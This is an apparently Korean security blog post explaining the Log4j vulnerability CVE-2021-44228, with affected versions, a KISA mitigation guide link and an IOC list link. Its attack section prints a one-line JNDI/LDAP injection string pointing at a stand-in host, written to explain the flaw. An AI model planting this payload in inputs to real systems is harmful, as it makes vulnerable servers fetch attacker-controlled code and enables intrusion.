๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
๐Ÿšจ ์ •๋ณด ๋ณด์•ˆ/News, IOC

Log4j ์ทจ์•ฝ์ ! / CVE-2021-44228

by Ji-Hoon 2021. 12. 19.

์ด๋ฒˆ์— ์ „ ์„ธ๊ณ„์—์„œ ์ด์Šˆ์ธ Log4j๊ฐ€ ์žˆ์–ด ์ธํ„ฐ๋„ท์—์„œ ์ฐพ์€ ์ •๋ณด๋ฅผ ํ•œ๊ณณ์— ์ •๋ฆฌ ํ•ด๋ดค๋‹ค! 

 

1. Log4j ๋ž€? 

- Apache Software Foundation์—์„œ ๊ฐœ๋ฐœ

- Java ๋กœ๊น… ํ”„๋ ˆ์ž„ ์›Œํฌ๋กœ ํ”„๋กœ๊ทธ๋žจ์˜ ๋กœ๊ทธ ๋‚จ๊ธฐ๋Š” ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ

- ๋Œ€๋ถ€๋ถ„์˜ ํ”„๋กœ๊ทธ๋žจ์—์„œ ์‚ฌ์šฉํ•˜๊ณ  ์žˆ์–ด ๋”์šฑ ์‹ฌ๊ฐํ•œ ์ทจ์•ฝ์ ์ด๋‹ค. 

 

2. ์–ด๋–ค ์ทจ์•ฝ์ ์ธ๊ฐ€? 

- CVE-2021-44228

- ํ•œ์ค„์˜ ์ฝ”๋“œ ๋งŒ์œผ๋กœ ์„œ๋ฒ„์— ์›ํ•˜๋Š” ๋ช…๋ น์„ ๋‚ด๋ ค ๊ณต๊ฒฉ์ž๊ฐ€ ์›ํ•˜๋Š” ๊ธฐ๋Šฅ ์ˆ˜ํ–‰ ๊ฐ€๋Šฅ. 

- ๋””๋ ‰ํ† ๋ฆฌ(LDAP ๋””๋ ‰ํ† ๋ฆฌ)๋ฅผ ํ†ตํ•ด ๋ฐ์ดํ„ฐ๋ฅผ ์ฐพ๊ธฐ ์œ„ํ•ด Java ํ”„๋กœ๊ทธ๋žจ์—์„œ ์‚ฌ์šฉํ•˜๋Š” Java Naming and Directory Interface (JNDI)๋ฅผ ์‚ฌ์šฉ

 

๋ฐฑ๋ฌธ์ด ๋ถˆ์—ฌ์ผ๊ฒฌ, ์•„๋ž˜ ์˜์ƒ์„ ๋ณด๋ฉด ์–ด๋–ค ๋Š๋‚Œ์ธ์ง€ ์ดํ•ด๊ฐ€ ๋œ๋‹ค

https://youtu.be/NOxSLe5GjOk

3. ๊ณต๊ฒฉ ๋ฐฉ์‹

${jndi:ldap://example.com/a}

- ์œ„์™€ ๊ฐ™์€ ์ฝ”๋“œ ํ•œ์ค„์ด๋ฉด ๊ณต๊ฒฉ์ž๊ฐ€ ์›ํ•˜๋Š” ๊ณณ example.com์œผ๋กœ ์ ‘์†ํ•˜๋„๋ก ๊ฐ€๋Šฅํ•˜๋‹ค. 

- ์ด ์™ธ์—๋„ ์—ฌ๋Ÿฌ ์•…์šฉ๋œ ๋ฐฉ๋ฒ•์ด ๊ณ„์† ๋“ฑ์žฅํ•˜๊ณ  ์žˆ๋‹ค. 

 

4. ์˜ํ–ฅ์„ ๋ฐ›๋Š” ๋ฒ„์ „ / CVE-2021-45105
o CVE-2021-44228
   - 2.0-beta9 ~ 2.14.1 ๋ฒ„์ „ (Log4j 2.12.2 ์ œ์™ธ)
 o CVE-2021-45046
   - 2.0-beta9 ~ 2.12.1 ๋ฐ 2.13.0 ~ 2.15.0 ๋ฒ„์ „
 o CVE-2021-4104
   - 1.x ๋ฒ„์ „
      โ€ป JMSAppender๋ฅผ ์‚ฌ์šฉํ•˜์ง€ ์•Š๋Š” ๊ฒฝ์šฐ ์ทจ์•ฝ์  ์˜ํ–ฅ ์—†์Œ

 

5. ์ทจ์•ฝ์  ๋Œ€์‘ ๊ฐ€์ด๋“œ

- ์•„๋ž˜ ์‚ฌ์ดํŠธ์˜ ์ฒจ๋ถ€ํŒŒ์ผ์— ์‰ฝ๊ฒŒ ์„ค๋ช…๋˜์–ด ์žˆ์–ด ์ฐธ๊ณ  ํ•˜๋ฉด ๋  ๊ฒƒ ๊ฐ™๋‹ค

- ๊ณ„์†ํ•ด์„œ ์ƒˆ๋กœ์šด ์ทจ์•ฝ์ ๊ณผ ๋ฒ„์ „์ด ๋‚˜์˜ค๊ณ  ์žˆ๊ณ  ๋‹น๋ถ„๊ฐ„ ๊ณ„์† ๋ชจ๋‹ˆํ„ฐ๋ง ํ•„์š”!! 

https://www.boho.or.kr/data/guideView.do?bulletin_writing_sequence=36390 

 

KISA ์ธํ„ฐ๋„ท ๋ณดํ˜ธ๋‚˜๋ผ&KrCERT

KISA ์ธํ„ฐ๋„ท ๋ณดํ˜ธ๋‚˜๋ผ&KrCERT

www.boho.or.kr

 

6. IOC ์ •๋ณด

- Log4j์™€ ๊ด€๋ จ๋œ IOC ์ •๋ณด๋Š” ์•„๋ž˜ ์‚ฌ์ดํŠธ์—์„œ ์ž˜ ๋‚˜์™€ ์žˆ๋‹ค

https://gist.github.com/blotus/f87ed46718bfdc634c9081110d243166

 

IPs exploiting the log4j2 CVE-2021-44228 detected by the crowdsec community

IPs exploiting the log4j2 CVE-2021-44228 detected by the crowdsec community - log4j_exploitation_attempts_crowdsec.csv

gist.github.com

 

์ฐธ๊ณ  ์‚ฌ์ดํŠธ

1. https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=36389&queryString=cGFnZT0xJnNvcnRfY29kZT0mc29ydF9jb2RlX25hbWU9JnNlYXJjaF9zb3J0PXRpdGxlX25hbWUmc2VhcmNoX3dvcmQ9 

 

๋Œ“๊ธ€